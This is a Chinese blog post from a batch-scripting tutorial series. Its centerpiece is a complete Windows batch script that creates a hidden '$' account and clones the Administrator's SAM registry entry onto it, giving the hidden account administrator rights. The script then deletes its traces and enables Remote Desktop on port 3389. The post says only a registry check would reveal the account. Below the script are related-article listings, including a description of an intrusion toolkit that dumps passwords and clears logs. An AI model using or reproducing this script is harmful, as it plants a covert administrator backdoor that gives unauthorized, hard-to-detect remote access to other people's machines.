批处理学习之四 克隆管理员账户

最新推荐文章于 2022-07-14 20:36:35 发布
最新推荐文章于 2022-07-14 20:36:35 发布
阅读量1k 收藏
点赞数
分类专栏: 学习 文章标签: user hex windows server
本文介绍了一种通过克隆管理员账户并开启远程桌面服务的方法,包括创建克隆账户、导出及修改注册表键值等步骤,最终实现隐蔽地开启3389端口。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、克隆管理员账户,再开3389,只有检查注册表才能被发现。

@echo off
::第一步 创建克隆账号
::设定克隆账号
set user=test
::设定被克隆账号
set buser=Administrator
::设定路径
set ridkey=HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/
::创建账号名为%user%$ 密码为%user%88 的隐藏账号
net user %user%$ %user%88 /add
::第二步 取出克隆账号的注册表项
::导出%user%$的rid标项
reg export %ridkey%Names/%user%$ %SystemRoot%/%user%$.reg
::取出%user%$的rid
for /f "tokens=2 delims=()" %%i in ('find /i "@=HEX" %SystemRoot%/%user%$.reg') do set userrid=%%i
::导出user$的账号配置项
reg export %ridkey%00000%userrid% %SystemRoot%/%userrid%.reg

::第三步 取出被克隆账号注册表项
::导出%buser%的rid标识项
reg export %ridkey%Names/%buser% %SystemRoot%/%buser%$.reg
::导出%buser%的rid
for /f "tokens=2 delims=()" %%i in ('find /i "@=HEX" %SystemRoot%/%buser%$.reg') do set buserrid=%%i
::导出buser$的账号配置想
reg export %ridkey%00000%buserrid% %SystemRoot%/%buserrid%.reg
::第四步 替换配置
::取出克隆账号的"V"=hex:部分
for /f "skip=6 delims=()" %%o in ('find /i "," %SystemRoot%/%userrid%.reg') do @echo %%o >>%SystemRoot%/%user%-last.reg
::建立头部
@echo Windows Registry Editor Version 5.00 >%SystemRoot%/%user%-first.reg
@echo.>>%SystemRoot%/%user%-first.reg
@echo [%ridkey%00000%userrid%] >>%SystemRoot%/%user%-first.reg
::取出被克隆账号的"F"=hex:,并合并到头部
for /f "skip=2 delims=()" %%q in ('find "," %SystemRoot%/%buserrid%.reg') do @echo %%q >>%SystemRoot%/systemreg001.reg
set /p a=<%SystemRoot%/systemreg001.reg
@echo %a:~0% >>%SystemRoot%/%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%/systemreg001.reg') do @echo %%o >>%SystemRoot%/systemreg002.reg
del /q %SystemRoot%/systemreg001.reg
set /p a=<%SystemRoot%/systemreg002.reg
@echo %a:~0% >>%SystemRoot%/%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%/systemreg002.reg') do @echo %%o >>%SystemRoot%/systemreg003.reg
del /q %SystemRoot%/systemreg002.reg
set /p a=<%SystemRoot%/systemreg003.reg
@echo %a:~0% >>%SystemRoot%/%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%/systemreg003.reg') do @echo %%o >>%SystemRoot%/systemreg004.reg
del /q %SystemRoot%/systemreg003.reg
set /p a=<%SystemRoot%/systemreg004.reg
@echo %a:~0% >>%SystemRoot%/%user%-first.reg
del /q %SystemRoot%/systemreg004.reg
::将"F"=hex:以前部分好了的,与"V"=hex:部分合并
type %SystemRoot%/%user%-last.reg >>%SystemRoot%/%user%-first.reg


::第四步 删除建立的克隆账号
net user %user%$ /del
::第五步 导入修改好的克隆账号注册表项
regedit /s %SystemRoot%/%user%-first.reg
regedit /s %SystemRoot%/%user%$.reg
del /q %SystemRoot%/%user%-first.reg
del /q %SystemRoot%/%user%-last.reg
del /q %SystemRoot%/%user%$.reg
del /q %SystemRoot%/%userrid%.reg
del /q %SystemRoot%/%buser%$.reg
del /q %SystemRoot%/%buserrid%.reg

::开3389
@echo Windows Registry Editor Version 5.00>%SystemRoot%/3389.reg
@echo.>>%SystemRoot%/3389.reg
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]>>%SystemRoot%/3389.reg
@echo "fDenyTSConnections"=dword:00000000>>%SystemRoot%/3389.reg
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]>>%SystemRoot%/3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%/3389.reg
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp]>>%SystemRoot%/3389.reg
::端口D3D 十六进制
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%/3389.reg

regedit /s %SystemRoot%/3389.reg
del %SystemRoot%/3389.reg

windows server 2008R2管理员帐户克隆
pmpgao的专栏
11-12 2095
windows server 2008R2管理员帐户克隆          大家知道,黑客入侵一台服务器,一般都会先建立一个帐户,然后再设法将该帐户进行提权,而且这个过程都是隐藏的,下面我们来试试如何将GUEST帐户提权成管理员(administrators)帐户。              提醒:为了意外情况发生,请先备份SAM文件。      1.首先进入注册表,找到SAM文件,位置是H
克隆管理员帐号的方法
afxid的专栏
06-07 1646
首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server
2008 r2 server 提权_windows server 2008 R2 管理员帐户克隆方法(图文)
weixin_39787606的博客
12-19 383
提醒:为了意外情况发生,请先备份SAM文件。1.首先进入注册表,找到SAM文件,位置是HKEY_LOCAL_MACHINE\SAM\SAM,默认情况下,SAM下面的所有子项全部是隐藏不可见的,右击SAM,在右键菜单中选择权限。2.在出现的权限对话框中,将administrators用户组的权限改成完全控制,然后再点击应用,确定。3.依次单击“查看”菜单----“刷新”,可以看到SAM下面的子项已经...
Windows操作系统克隆账户
weixin_48824655的博客
07-14 1900
Windows操作系统克隆账户
复制并真正隐藏administrator帐号(完全批处理)
weixin_34033624的博客
06-23 199
收藏下,有机会用下! 网上看了很多复制administator权限帐号的方法或者工具,比如建立admin$,所谓的隐藏帐号。 并复制administrator的权限。 其实这是...
【计算机管理与注册表编辑】Windows系统管理员工具与用户账户管理:本地用户和组、远程桌面配置及SAM权限设置,具体教学与批处理可私信我
最新发布
04-19
适合人群:具备一定Windows系统管理基础的技术人员,尤其是负责企业内部网络和用户账户管理的IT管理员。 使用场景及目标:①当需要恢复或重新配置被禁用的用户账户时;②在进行系统故障排除或安全审计时,了解如何...
自动化克隆guest用户到管理员
"该资源是一个批处理脚本(guest.bat)...此外,克隆用户到管理员组可能违反某些系统的安全策略,因此在实际操作中应谨慎对待。对于非专业人士,建议使用更安全且支持审计的日志管理工具或系统管理软件来管理用户账户
BAT批处理脚本-系统设置查询修改硬件相关-NewSID-生成新的安全标识符.zip
12-26
"NewSID"工具就是一个这样的实用程序,它能帮助管理员更改系统的SID,以及与之相关的所有用户账户和组的SID。在使用前,需要注意的是,这个过程会修改系统的关键信息,因此在操作之前务必备份重要数据,且确保你有...
使用SalesforceSpec批处理脚本自动化组织规格文件生成
这些文件允许开发者和管理员在组织之间复制或迁移配置,或者为自动化测试和部署提供支持。批处理脚本为创建这些规范文件提供了一种自动化的方法。 1. **自定义对象**: 自定义对象是Salesforce平台上能够储存额外...
自动化启动VSCode:使用批处理文件优化工作流程
自动化是提高效率的重要手段之一,而自动化启动Visual Studio Code(VSCode)则是其中的一个小步骤,但这个步骤却可以极大地改善开发者的日常工作流程。在现代开发环境中,频繁地启动和关闭编辑器是常态,自动化启动...
复制并真正隐藏administrator帐号(完全批处理).htm
02-05
复制并真正隐藏administrator帐号(完全批处理).htm
MT工具,删除克隆账号
03-09
选项 : -filter ---更改 TCP/IP 过滤器的开头状态 -addport ---添加端口到过滤器的允许列表 -setport ---设置端口作为过滤器的允许列表 -nicinfo ---列出 TCP/IP 界面信息 -pslist ---列出活动进程 -pskill ---杀死指定进程 -dlllist ---列出指定进程的 DLL -sysinfo ---列出系统信息 -shutdown ---关闭系统 -reboot ---重启系统 -poweroff ---关闭电源 -logoff ---注销当前用户会话 -chkts ---检查终端服务信息 -setupts ---安装终端服务 -remts ---卸载终端服务 -chgtsp ---重置终端服务端口 -clog ---清除系统日志 -enumsrv ---列出所有服务 -querysrv ---列出指定服务的详细信息 -instsrv ---安装一个服务 -cfgsrv ---更改服务配置 -remsrv ---卸载指定服务 -startsrv ---启动指定服务 -stopsrv ---停止指定服务 -netget ---从 http/ftp 下载 -redirect ---端口重定向 -chkuser ---列出所有账户、sid 和 anti 克隆 -clone ---克隆 admin 到目标 -never ---设置账户看上去从未登录 -killuser ---删除账户,甚至是 "guest" 也可删除 -su ---以 Local_System 权限运行进程 -findpass ---显示所有已登录用户的口令 -netstat ---列出 TCP 连接 -killtcp ---杀死 TCP 连接 -psport ---映射端口到进程 -touch ---设置文件日期和时间到指定值 -secdel ---安全擦除文件或目录占用的空间 -regshell ---进入一个控制台注册表编辑器 -chkdll ---检测 gina dll 后门 杀毒软件可能报为病毒
手工克隆管理员帐户(转)
weixin_30555125的博客
04-04 186
帐号克隆是指通过技术手段让一个普通用户拥有和管理员一样的权限和桌面,而从外表看来这个普通用户还保持原来的属性,非常具有隐藏性,是一种常见的后门形式。 下面,我手工把guest帐户克隆管理员(administrator),先来看下guest帐户在克隆前的状态和属性,如下图: 图一 图二 接着,打开注册表,找到如下键值:HKEY_LOCAL_MACHINE\SAM\SA...
创建windows隐藏系统账号,并克隆管理员账号
m0_66061261的博客
05-26 1067
创建windows隐藏系统账号,并克隆管理员账号
windows创建隐藏用户和克隆管理员用户
热门推荐
Au
02-02 1万+
账号克隆就是复制管理员的注册表信息 搭建环境     虚拟机是windows server 2008,开3389,查看ip地址进行远程登录   登录后查看用户 创建一个用户  $ 可以使该用户在命令行中隐藏,本文为演示实现创建隐藏账号,可直接修改guest等默认用户进行克隆实现隐藏后门   我们再次查看用户,发现并没有 au$ 这个用户,但是在用户管理中可以发现 ...
Windows创建克隆隐藏账号
木尤的博客
07-19 3051
Windows创建克隆隐藏账号 当我们需要在创建一个账号让cmd命令net user 和计算机管理用户中看不到,又需要这个账号具有管理员权限时,这个时候就需要管理员克隆账号了。 1.打开cmd输入命令: net user test$ 123456 /add 这条命令创建了一个test账号,$的意思是隐藏的意思,虽然在cmd命令net user中看不到此账户了,但是在计算机管理账户中还是能够看到此账号,如图 刚刚创建的test$账号还是user用户组,现在需要提到administrator用户组,命
删除windows server 克隆账户
Sunshine晶滴博客
12-01 1129
1、打开注册表【运行,输入regedit.exe】 2、①依次打开:HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains\Account\Users \ ②打开Names,找到克隆账户: ③右击,删除
Windows系统克隆***与防范
weixin_34117211的博客
01-04 686
随着电脑技术的发展和电脑的普及,还有大大小小的“骇客”网站和越来越简单的工具,使得目前***变得日趋频繁,被植入***的电脑或服务器也越来越多,与此同时系统管理员的安全意识也在不断提高,加上杀毒软件的发展,网络***的生命周期也越来越短,所以***者在获取了服务器的控制权限后,一般使用克隆用户或者安装SHIFT后门达到隐藏自己的目的,下面就由我给大家介绍一些常见的克隆用户和检...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值